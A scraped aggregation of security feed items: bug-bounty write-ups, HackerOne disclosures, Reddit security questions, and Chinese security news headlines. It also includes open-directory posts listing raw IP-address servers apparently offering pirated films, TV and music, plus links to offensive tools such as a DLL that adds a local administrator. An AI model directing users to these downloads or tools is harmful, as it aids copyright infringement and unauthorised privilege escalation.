    Summary: I discovered that I can spoof any Instagram username on Instagram shop, with this bug scammers can trick people into thinking… Continue reading on Medium »  ( 1 min )
    Why we use Nmap?
    I clear this topic in 2 points 1. As a hacking or penetration testing. 2. Use in bug bounty. 1. As a Hacker- We know that nmap is network… Continue reading on Medium »  ( 1 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God. Continue reading on InfoSec Write-ups »  ( 4 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below: Continue reading on InfoSec Write-ups »
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    My new discoveries....
    http://www4.co.black-hawk.ia.us/engineer/ - Road Establishment Records, County Aerials, Road Establishment Records https://www.ndbc.noaa.gov/data/ - So much data! http://167.114.174.132:9092/ - Movies, Series, Music, etc http://162.12.215.254/ - Movies, Android Apps and Games, Software, Tv Series submitted by /u/ManaHoney504 [link] [comments]  ( 1 min )
    Archive.org (9th Time, Jim!)
    Is not an open directory. C’mon, mods, help us out here? edit/ apparently archive.org is technically an open directory. Thanks mod for addressing this and making the community an even better place for us pirates. Rrrrrrrr, matey. edit2/ PEACE AND LOVE, this is not a post directed to anyone in specific. PEACE AND LOVE. submitted by /u/martusfine [link] [comments]  ( 2 min )
    lots of books
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Is there a better alternative for Mega and Google Drive?
    Please recommend a file sharing service that is better than the two aforementioned. I am uploading books and PDFs concerning translations and machine learning. Something quite unknown to most and not too much of a hassle. Not too keen on bans and removals submitted by /u/Burlack [link] [comments]  ( 2 min )
  • Open

    Fuzzing and exploiting map parser in Teeworlds
    submitted by /u/mmmds [link] [comments]
  • Open

    Beyond the Borrow Checker: Differential Fuzzing
    Article URL: https://tiemoko.com/blog/diff-fuzz/ Comments URL: https://news.ycombinator.com/item?id=29811302 Points: 2 # Comments: 0  ( 14 min )
  • Open

    SecWiki News 2022-01-05 Review
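    Focusing on the Chaos in Algorithmic Recommendation and Building an Algorithm Security Governance System by ourren; Where Do Good Work Ideas Come From by ourren; Open Source Intelligence and Its Application in Next-Generation Cyber Security: A Literature Review by ourren; Product Knowledge Graph Construction and Entity Alignment by ourren; What Crimes Might Web Crawler Companies Commit by ourren; For more of the latest articles, visit SecWiki  ( 2 min )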
  • Open

    KNOW YOUR PUBLIC PRESENCE ONLINE
    Day in and day out people sign up for services and fast forward lose track of these services because they don’t use them. It will be… Continue reading on Medium »  ( 2 min )
    The OSINT-ification of ISIS on the Dark Web
    *Note: This article was originally published by the author on March 11, 2019. Continue reading on Medium »  ( 11 min )
  • Open

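    A Brief Analysis of Using Processes to Implement File Control
    The article "An Analysis of Process Creation" explained some Linux commands as well as process creation and process states, and worked through a few small labs. This article continues from that one, explaining some file operation commands and working through some small labs.  ( 1 min )
    Cyberspace Administration of China Plans to Revise the "Provisions on the Administration of Mobile Internet Application Information Services"
    On January 5, 2022, the Cyberspace Administration of China revised the "Provisions on the Administration of Mobile Internet Application Information Services", which formally took effect on August 1, 2016.
    FreeBuf Morning Report | DatPiff Data Breach Affects Millions; Raise Anti-Fraud Awareness and Don't Let Screen-Sharing Scams Succeed
    The Cyberspace Administration of China has drafted revisions to the "Provisions on the Administration of Mobile Internet Application Information Services" already in force and is now soliciting public comments.  ( 1 min )
    Purple Fox Malware Spreads Disguised as a Telegram Installer
    Unlike the way other malware spreads, the new distribution method adopted by Purple Fox further improves its stealth.  ( 1 min )
    A Roundup of Serious Cyber Attacks in 2021
    A roundup of cyber attacks suffered by some entities around the world in 2021.  ( 1 min )
    While You Watch Videos, Hackers Are Stealing Your Credit Card Information
    In this supply chain attack, the Unit42 security team found more than 100 real estate websites affected by the campaign in total, which means the attack was very successful.  ( 1 min )
    US Wireless Carrier UScellular Discloses a Data Breach That Occurred at the End of the Year
    UScellular, one of the largest wireless carriers in the United States, disclosed a data breach that occurred in December of last year.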
  • Open

    FTC warns companies to remediate Log4j security vulnerability
    Article URL: https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=29806997 Points: 2 # Comments: 1  ( 5 min )

  • Open

    How to change my public ip manually
    I already checked that my IP is dynamic, but it seems to change only after a long time. Does anyone know how to make it change manually? I have already spent about 1 month and tried restarting the router, but it did not work submitted by /u/Shark233F [link] [comments]  ( 1 min )
    Was I DDOS attacked?
    I was browsing the PHP files on a website and kept getting remote force disconnected, and after reconnecting a few times suddenly nothing would load, not even other sites like Google. Switching over to a different network and going back to the site, it worked fine. Can't confirm but it also looked like the load on the entire previous network went up. The acronyms start to run together with trying to differentiate DOS, DDOS, and DNS, DNS Flood, IPv4, IPv6, and DDNS, so I'm wondering if this was a DDOS attack on my specific DNS. Did they try to flood the IP with traffic to stop connectivity to the internet, or was something else going on? The website was public and anyone could see the stuff, but they must have been monitoring the traffic somehow and decided to disconnect what I was looking at, but after changing over networks everything was still up in the exact same place. The network I was on was probably bigger than theirs, being some random site, and it didn't look like they brought down the whole network, so it's strange that even other sites wouldn't load. I ran a WHOIS on the site and it turned out to be some Namecheap domain running on a Cloudflare server registered under a fake address, and it's only been up for about 14 months. submitted by /u/NoFilterr [link] [comments]  ( 1 min )
    State-of-the-art models or techniques applied to InfoSec?
    Hello, I'd like to know about some good and innovative practices that you can't find in standard guidelines like the ISO 27001 for example. The thing is, my company is stuck in the early 2000s with a Zero Trust policy for everything (which can be bypassed easily) and this is just a pain in the ass, not efficient at all considering it just makes workers 100% dependent on IT for any requirement. So I want to ask for your advice submitted by /u/Key-Clothes-152 [link] [comments]  ( 1 min )
    Zscaler's Cloud Workload Communications protection
    Happy new Year everyone, Wonder if anyone had any experience with this so far? https://www.zscaler.com/press/zscaler-extends-its-proven-zero-trust-exchange-platform-deliver-zero-trust-workloads submitted by /u/killb0p [link] [comments]
    We all love MFA - is it a good idea to keep Google Authenticator addon in Chrome / Web Browser?
    I'm always thinking twice before installing any addon in my web browser. Very often removed it after I used it. However, there are addons designed to stay for longer. Like, google authenticator addon and alike. Q: For sake of security, is it a good idea to keep Google Authenticator addon in chrome or just forget about it and stick to the smartphone / pass-manager? submitted by /u/bitsailor [link] [comments]  ( 2 min )
    Proxy scanning(xpost r/hacking)
    so i just started looking into 0.0.0.0/0 scanning and it has shown a lot of potential so far with applications like zmap and zgrab, had a lot of fun joining random minecraft servers, but i would like to explore a more practical, useful you might say, approach. when i think of scanning the internet other than vulnerable DNS servers, i think about those looooong ass free proxy lists sitting there in the open. I know, i know those are not anonymous, but i was wondering, how the duck do they get those lists, they are obviously not their servers, and to add to that proxies often have random ports, how do you scan for a service that has random ports, even then if you find a server with a port 80 or 8080 it could just be an http server out there, how do you identify it is an actual proxy, banner perhaps? ps: pls do not point out proprietary software or any if you can, i'm trying to learn here (TL;DR) i want a proxy list, made by me, and im struggling, pls help submitted by /u/filippobob [link] [comments]  ( 1 min )
    Suricata: anomaly-based detection?
    i tried Googling this, but am getting mixed messaging. It's signature based, but can detect anomalies? submitted by /u/albertcuy [link] [comments]  ( 1 min )
    tcpdump: how to keep packets that contain a substring only
    I have the following tcpdump command: sudo tcpdump -i eth0 -nn -A -s 65535 -w somepackets2.cap "(port not 443) && (less 15) && (tcp) && (greater 30)", but I want to add on another "and" condition that keeps only packets that contain "mysubstring". How can I do that? submitted by /u/social-bleach [link] [comments]  ( 1 min )
    Phishing email sent from own mail? Email spoofed or hacked?
    So, I received one those threat emails where they say my device is compromised, and the sender is myself. Phone is fine, no signs of viruses, I'm careful as well, have Adblock, have HTTPS everywhere. Google lists no suspicious activity, no traces that my mail was hacked. I changed passwords anyway, but can't help but be paranoid. I know it's possible to spoof an email address, and Google itself says the sender may not be the address shown. I was trying to see the original header with the help of a howtogeek guide, but there's no email address other than my own. Mail says it's a zero click vulnerability, that I was hacked through a website, but it all seems very unlikely. Can anyone please elaborate on this? My mail was not hacked? I'm not on have I been pwned, which is why I was extra concerned: how the heck do they have my email? submitted by /u/Unluckyclover_ [link] [comments]  ( 1 min )
    Do integer overflows also buffer overflow?
    Hi, I'm currently learning about C and the classic vulnerabilities that arise. Right now buffer overflows. So, just to sum up my understanding, an example like this will overflow because 'ab', which is two bytes, is too big to store in the last byte of "buff": char buff[10]; buff[9] = 'ab'; The wiki article about buffer overflows defines them as follows: "while writing data to a buffer, overruns the buffer's boundary" This got me thinking that this sounds a lot like integer overflows. Trying to put something into a container that it cannot contain. But let's take the following example of an integer overflow (I use unsigned char for having the most simple case): unsigned char c = 255; unsigned char cc = c + 1; Ok, so the single byte of the char cannot contain a value higher than 255, and thus it does modulo. And my understanding of integer overflow is that internally, the computer tries to put a 1 to the left of the current number, such that if 255 looks like this: 11111111 then it simply assumes that there exists a place that represents 256, and tries to create this binary number: 100000000 But there is no such bit, and therefore the number just becomes 00000000. But the single 1 that is lost, doesn't that go somewhere in memory? For that reason, my thought was that integer overflows would have to also contain buffer overflows. Is this true? Further thoughts: At the core of the issue is a question of what actually constitutes a buffer in C. You could maybe argue that this problem would have been better suited for r/learnprogramming. But yeah, my guess is that it depends on whether or not a certain variable counts as a buffer. Is an int a buffer? Is a char[]? etc? submitted by /u/GarseBo [link] [comments]  ( 2 min )
    What position would be most qualified for hacking?
    From reading this I'm thinking Security Analyst would be closest https://www.cs.seas.gwu.edu/cybersecurity-roles-and-job-titles submitted by /u/cookred [link] [comments]
  • Open

    The Story Of How I Bypass MAC Filter
    Hello everyone, Continue reading on Medium »  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux Continue reading on InfoSec Write-ups »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on System Weakness »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on Medium »  ( 2 min )
    How to freely borrow all the TVL from the Jet Protocol
    Recently I discovered a critical vulnerability that could possibly lead to the loss of funds in the smart contract of Jet Protocol, a… Continue reading on Medium »  ( 3 min )
    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
    SQL Injection - The File Upload Playground
    Summary : Continue reading on Medium »  ( 3 min )
    Spotlight: Earn Bitcoin While Browsing The Web On Desktop And Mobile
    Is it too good to be true? Well, join me on my quest to find out. Continue reading on Medium »
  • Open

    British Tv-Episodes of The Avengers, Bergerac, TOTP, The Professionals, Coronation Street, Dr Who. (1 seri Doomwatch, Dr Who (inferno)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Dr who literature
    submitted by /u/International_Milk_1 [link] [comments]
    Channel for old British TV stuff, mostly it would seem for kids, e.g. Paddington Bear, but also Dad's Army, One Foot in the Grave, etc etc.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    I have hundreds of *credible* books on corruption, parapolitics, economic warfare, propaganda, and state crimes. I’d like to share them but they are on an iCloud folder and too large to download. Is there anyway to transfer directly to Mega, please?
    submitted by /u/Few_Tumbleweed7151 [link] [comments]  ( 2 min )
    Smallish list of mostly Japanese movie and tv stuff. Some raw, some with english subs, some english dubs.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    FTP: Misc IBM software, marketing & training materials, annual reports, etc from 1994 to present
    submitted by /u/xuvatilavv [link] [comments]
    BSG Battlestar Galactica 720p Complete 2003-2012 Extras Subs
    http://37.187.18.191/tv/BSG%20Battlestar%20Galactica%20720p%20Complete%202003-2012%20Extras%20Subs/ submitted by /u/SeniorAlbatross [link] [comments]
    Anime Fansubs
    submitted by /u/International_Milk_1 [link] [comments]
    David Bowie Bootlegs
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    OPEN REDIRECT
    Nutanix disclosed a bug submitted by kauenavarro: https://hackerone.com/reports/1369806
    Buffer overflow in req_parsebody method in lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1434056 - Bounty: $2000
    %0A (New line) and limitness URL leads to DoS at all system [Main adress (https://www.acronis.com/)]
    Acronis disclosed a bug submitted by plantos: https://hackerone.com/reports/1382448
  • Open

    Sears Garage Door Signal Reverse Engineering
    submitted by /u/mdulin2 [link] [comments]  ( 1 min )
    Domain Persistence - AdminSDHolder
    submitted by /u/netbiosX [link] [comments]
    Cache Poisoning at Scale
    submitted by /u/albinowax [link] [comments]
  • Open

    SecWiki News 2022-01-04 Review
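    CodeAnalysis: Tencent Static Code Analysis by ourren; Cybersecurity Standard Practice Guide: Guidelines for Network Data Classification and Grading by ourren; Backend Architecture Design That Withstands 10 Billion Red Packet Requests by ourren; For more of the latest articles, visit SecWiki  ( 2 min )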
  • Open

    Top books to learn Android Hacking & Security
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

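    A Quick Read of 17 Key Points of the "Cybersecurity Review Measures"
    The "Cybersecurity Review Measures" have been released; please get familiar with these key points as soon as possible.  ( 1 min )
    FreeBuf Morning Report | Portugal's Largest Media Group Hit by Ransomware Attack; Israeli Media Attacked on the Anniversary of Soleimani's Killing
    Global news: 1. Israeli media hacked on the anniversary of Soleimani's killing. On the anniversary of the killing of Islamic Revolutionary Guard Corps commander Soleimani, threat actors compromised the English-language website of the Israeli outlet The Jerusalem Post and the Twitter account of Maariv. [Foreign press - read the original] 2. Greek hackers "take over" NASA director's social media account. The personal Twitter account of NASA director Parimal Kopardekar was compromised by Greek hackers. A spokesperson for the hacker group said that this time  ( 1 min )
    Interview with Yun Shu of 默安科技: Integrating Security into Development, as Quietly as Spring Rain Nourishing the Earth
    Yun Shu, co-founder and CTO of 默安科技, has more than 16 years of experience in security, is a prominent voice in the industry, and is an important evangelist of the deception defense concept.  ( 1 min )
    The Five Security Topics Most Worth Watching in 2021: Everything You Care About Made the List
    This may indicate that, as new ways of working become "normalized", the outside world is more keen to follow innovation in cybercrime.  ( 1 min )
    The Past and Present of Security Situational Awareness
    The emergence of security situational awareness is an inevitable result of the development of national security strategy.  ( 1 min )
    Research on DNS Rebinding Attacks
    Each time you click a suspicious link, a DNS rebinding attack, besides exploiting applications with DNS rebinding vulnerabilities, may even let an attacker instantly take control of the other connected devices on your home network.  ( 1 min )
    Broward Health Discloses Data Breach Affecting More Than 1.3 Million People
    Notably, the point of intrusion was identified as a third-party medical provider, which delivers services by connecting to the healthcare system and therefore holds a certain level of access.  ( 1 min )
    On the First Day of 2022, Microsoft Exchange Could Not Send Email
    A new year brings a fresh start, but on the first day of 2022 Microsoft played a not-so-small "joke" on everyone.  ( 1 min )
    Greek Hackers "Take Over" NASA Director's Social Media Account
    The Twitter account of NASA director Parimal Kopardekar was compromised by Greek hackers.  ( 1 min )
    Incident Response: Analyzing Outbound Connection Requests
    Handling and analysis of a malicious DNS request resolution incident  ( 1 min )
    A Roundup of Prevalent Ransomware in 2021
    In 2021, manufacturing, services, construction, finance, energy, healthcare, industrial control and government organizations around the world were frequently hit by ransomware attacks, causing serious losses to global industrial output.  ( 1 min )
    doorLock Vulnerability Disclosed in Apple iOS Can "Brick" Phones
    A new persistent denial-of-service vulnerability named "doorLock" was discovered in Apple HomeKit, affecting system versions from iOS 14.7 to iOS 15.2.  ( 1 min )
    Cyberspace Administration and Three Other Departments Issue the "Provisions on the Administration of Algorithmic Recommendation in Internet Information Services"
    The Provisions specify that "applying algorithmic recommendation technology" means using algorithmic technologies such as generation and synthesis, personalized push, ranking and selection, retrieval and filtering, and scheduling and decision-making to provide information to users.
    Thirteen Departments Revise and Issue the "Cybersecurity Review Measures", Effective February 15, 2022
    The Measures specify that network platform operators holding the personal information of more than 1 million users must apply to the Cybersecurity Review Office for a cybersecurity review before listing abroad.
    The Big 2021 Ransomware Roundup
    Why does ransomware have so much power that every industry "turns pale at the mention of it"? Faced with ransomware, can we only "lie flat"?  ( 1 min )
    A Summary of Authorization Bypass Attacks in Real-World Engagements
    This article summarizes the authorization bypass attacks encountered in this year's penetration tests. I hope we can all learn together, and if there are shortcomings or suggestions, please raise them promptly.  ( 1 min )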
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Solving OSINT Dojo’s 2022’s first quiz
    Today I am solving first 2022 quiz post by #OSINTDojo Continue reading on Medium »  ( 2 min )
    Claim: China operated black jail in Dubai — Open Source Analysis
    In August 2021 Associated Press (AP) reported a claim that a Chinese woman was held at a “Chinese-run secret detention facility ” in Dubai Continue reading on Medium »  ( 4 min )
  • Open

    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )
  • Open

    Simple DLL that creates and adds an user to the local Administrators group
    A simple C++ DLL that creates and adds a user to the Local #Administrator group. Useful when dealing with privilege escalation on Windows to gain local administrator access and you do not care about opsec. Repo: https://github.com/notdodo/adduser-dll submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
  • Open

    doorLock: HomeKit DoS/semi-bricking Vulnerability (Via Home Invitation)
    Article URL: https://twitter.com/trevorspiniolas/status/1477185285784051712 Comments URL: https://news.ycombinator.com/item?id=29793176 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )

  • Open

    ASK: What should I look for in a Masters Program before opting for it
    Hey everyone, I have been thinking of pursuing a masters in cybersecurity. I love tinkering with low level stuff, especially embedded systems and exploit development. But I don't know if the universities offer courses targeting them. Can the community suggest some good unis that I can apply to based on my inclination? PS: Can someone also take a look at my SOP? I don't have anyone who can proofread my SOP. submitted by /u/sidhu97ss [link] [comments]  ( 1 min )
  • Open

    Basic Overview: Active Directory Hacking
    Introduction Continue reading on Medium »  ( 3 min )
    TryHackMe — Advent of Cyber 3 (2021) WriteUp
    WriteUp for all Challenges in THM Advent of Cyber 3 Continue reading on Medium »  ( 16 min )
  • Open

    Disney Channel Stuff+
    submitted by /u/International_Milk_1 [link] [comments]
    Dr Who (The original series) Seasons 1-8.
    submitted by /u/International_Milk_1 [link] [comments]
    Some old movies and Tv series
    submitted by /u/International_Milk_1 [link] [comments]
    Columbo episodes
    submitted by /u/International_Milk_1 [link] [comments]
    Mixture of BBC Radio stuff. Fact and Fiction.
    submitted by /u/International_Milk_1 [link] [comments]
    movies for the film buff
    submitted by /u/International_Milk_1 [link] [comments]
    archive.org link to Japanese movies, tv series with english subtitles filtered by title.
    submitted by /u/International_Milk_1 [link] [comments]
    large dex
    http://90.146.184.46/ submitted by /u/Dagad0s [link] [comments]
    Musikk (FLAC + MP3)
    https://85.166.158.78/RaidNAS/Lyd/Musikk/ [DIR] Atreyu/ 11-Oct-2019 23:56 - [DIR] Avenged.Sevenfold/ 08-Nov-2019 23:46 - [DIR] Bullet.For.My.Valentine/ 08-Nov-2019 23:52 - [DIR] Metallica/ 12-Oct-2019 00:06 - [DIR] Nirvana/ 12-Oct-2019 00:06 - [DIR] Papa.Roach/ 12-Oct-2019 00:08 - [DIR] Pink.Floyd/ 12-Oct-2019 00:13 - submitted by /u/Dagad0s [link] [comments]
    mostly Metallica / Nightwish (largely FLAC 24/96)
    https://seisho.us/swap/ submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    Sheetmusic for (wind)band
    Nice collection of sheetmusic (scores and parts) for (wind)band https://camdencommunityband.org.au/wp-content/uploads/2019/07/ submitted by /u/notmcgvien [link] [comments]  ( 1 min )
    nice selection (FLAC \ MP3)
    http://51.198.90.160/resources/Music/ submitted by /u/Dagad0s [link] [comments]
    I made an OD browser with IMDB ratings built in
    Hey r/opendirectories! I made a web app that helps me identify poorly rated movies in open directories so I can avoid them. This post isn't to promote my project or anything -- which is why I am not disclosing the name or sharing the link to the git repo -- I am writing to gather feedback and to see if people would be interested in using it when it becomes mature enough one day. https://i.redd.it/nblwcs660f981.gif First off, why I made this tool and what the tool does: I am a casual OD user who downloads just a couple movies at a time. It's not difficult to guess that I do a lot of Google searches to decide on what I want to download -- sometimes you can go through 20+ poorly reviewed movies before seeing something decent. I wanted something I can use to rule out bad mov…  ( 3 min )
    An MSX site that links to a bunch of directories.
    Just scroll down to enjoy this neat little rabbithole. https://www.file-hunter.com submitted by /u/EmuAnon34 [link] [comments]
    "New Wave Theatre" - Episodes 1 through 25: Internet Archive. Live music from the early 1980s on Night Flight
    submitted by /u/FireHole [link] [comments]
  • Open

    Log4Shell: RCE 0-day exploit on
    U.S. Dept Of Defense disclosed a bug submitted by mr_x_strange: https://hackerone.com/reports/1429014
  • Open

    What was 2021 like for your SOC?
    What was 2021 like for your SOC? Any workflow or tool changes that made an impact? Did your team handle more or less incidents? submitted by /u/wowneatlookatthat [link] [comments]
    Phone camera related question
    How do I find out whether my phone's camera is turned on or off? I don't have any sort of LED indicator next to my phone's camera. Is there any other way? To see whether camera is being used or not? If I'm using (for example: Snapchat) to take a picture/video, then can other camera apps on my phone like Tiktok/Kiradroid/WhatsApp camera also be turned on simultaneously ? Is it possible for other camera apps to see what I'm recording on Snapchat? note- On Tiktok's permission : run foreground service is mentioned. submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    Is it safe to hide insecure servers in intranet?
    Is it generally safe to hide insecure servers (like a REST API server without authentication, no JWT, no basic auth) in an intranet (or a docker network without publishing the port)? What kind of risk will I be exposed to? Let's say I have server A, B and C, and I will publish and expose server A to the public, and I only want server B and C to be reached by server A. Is it safe to keep server B and C in the intranet (server A will be in that intranet as well, but exposed to the public)? submitted by /u/hksparrowboy [link] [comments]  ( 2 min )
    Call listening symptoms, spy tech, dual sim or cloning? How can one get proof of this that is admissible as evidence?
    I am being stalked by my ex, pretty sure she has screwed herself an army of tech-savvy individuals to help her. It’s been almost 2 years, I just want to get proof or get her to leave me alone. So if someone was spoofing my phone listening to my calls, is it a possibility that if they hung up before I was off the phone I could get an incoming call from the person I was talking to currently and their phone would suddenly start ringing like they called me again? This phenomenon has happened 3-5 times to me before I realized it has only happened since my ex moved out. She somehow had my phone cloned and was following me all over the internet as she could see where I was posting. I don’t think she could modify things on the phone like screenshots, but someone else handles package delivery. I got a new Samsung phone and within three days I had four apps that had been sideloaded on there, one of them the Verizon app that allows you to supposedly hack a phone; I of course deleted them. I watched the Google family app appear miraculously onto my phone screen at a concert while trying to discern if that was my ex standing approximately 40 yards away who should’ve been home with our daughter. I moved in to see if it was her and she hid behind her hair while walking 20 yards ahead and exited the concert. Pretty sure she has contacted clients and told them outlandish lies to create problems, women I was talking to, follows me all over the internet posting where I post, creating accounts where I have accounts, all in the name of narc psychopath bs. It was bad enough, all the cheating that came to light and the mental abuse when we lived together, now this shit. Any help would be great, thanks. submitted by /u/itwasEMOTIONALmurder [link] [comments]  ( 4 min )
    ELI5: Why can a message not be decrypted with the public key in PKI?
    Apologies if this is the incorrect sub for this, but this is the only one I found that I thought would fit. I’m studying for Sec+, and currently trying to understand the PKI and asymmetric encryption protocols. Say for example I encrypt a message using google’s public key to Google.com, and a MITM intercepts it. Why can’t the MITM decrypt the message using the public key when it was encrypted using the public key in the first place? Why does it have to be decrypted using the private key? Thank you for the help! submitted by /u/bookandrelease [link] [comments]  ( 3 min )
  • Open

    A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain
    A supply chain attack leveraging a cloud video platform to distribute web skimmer campaigns compromised more than 100 real estate sites. The post A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain appeared first on Unit42.
  • Open

    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF? Continue reading on Medium »  ( 3 min )
    100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
    Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude Continue reading on Medium »  ( 1 min )
    Bug Report Update
    As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every… Continue reading on Medium »  ( 1 min )
    Story of YouTube’s Unfixable Ads Bypass
    Hello there! I hope everything is going well with you; today I will talk about my YouTube Ads bypass. Continue reading on Medium »  ( 3 min )
    P5 to P1: Interesting Account Takeover
    Hello Guys, Continue reading on Medium »  ( 2 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Best free utility to take an image of an iOS device?
    Hi there, I’m learning how to use Autopsy, and it has an iOS ingest module (iLEAPP). iLEAPP will accept a compressed .tar/.zip file or an iTunes backup. What’s the best way to capture an image of an iOS device? Would an iTunes backup encompass almost everything (excluding Health data, etc.), or is there a better utility? Thanks! submitted by /u/hamsterbilly [link] [comments]  ( 1 min )
  • Open

    A Beginner's Story on How a Cheapo Standard Issue Router was hacked.
    submitted by /u/secnigma [link] [comments]  ( 1 min )
    One of my better-documented exploits, CVE-2017-5816 whitepaper
    submitted by /u/oxagast [link] [comments]
    Vulnerability in log4j 2.17.0 more hype than substance | LunaSec
    submitted by /u/breadchris [link] [comments]  ( 1 min )
    /r/netsec's Q1 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 2 min )
    Malicious Telegram Installer Drops Purple Fox Rootkit
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    google/log4jscanner: A log4j vulnerability filesystem scanner and Go package for analyzing JAR files.
    submitted by /u/maryetan [link] [comments]
    C++ Memory Corruption (std::vector) - part 2
    submitted by /u/Gallus [link] [comments]  ( 1 min )
  • Open

    Vulnerability in Log4j 2.17.0 more hype than substance
    Article URL: https://www.lunasec.io/docs/blog/log4j-hype-train/ Comments URL: https://news.ycombinator.com/item?id=29782471 Points: 2 # Comments: 0  ( 6 min )
  • Open

    SecWiki News 2022-01-03 Review
    SecWiki Weekly (Issue 409) by ourren QingScan: a vulnerability scanner glue tool by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Optimizing Windows Function Resolving: A Case Study Into GetProcAddress - phasetw0
    submitted by /u/dmchell [link] [comments]
    airbus-cert/Invoke-Bof: Load any Beacon Object File using Powershell!
    submitted by /u/dmchell [link] [comments]
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts, this Christmas I played “Yogosha CTF 2021” challenge as I got a mail from their team on 28th December, and I…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone, this is Ayush and from today 01–01–2022, I’m going to start 100daysofhacking challenge to improve my hacking skills. So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

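    Cross-platform network security tool suite CaptfEncoder v3.0.1
    CaptfEncoder is a cross-platform network security tool suite. The V3 release is developed in Rust, with a small executable, faster speed, better performance, and more features.  ( 1 min )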

  • Open

    Quick question
    I am a novice, please go easy on me for asking this lol. If I am asked to assign an IPv4 to a PC NIC, what does this look like in CLI? Is this the same as simply assigning an IP to the PC itself or is it something else? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Masters degree, good and cheap ones?
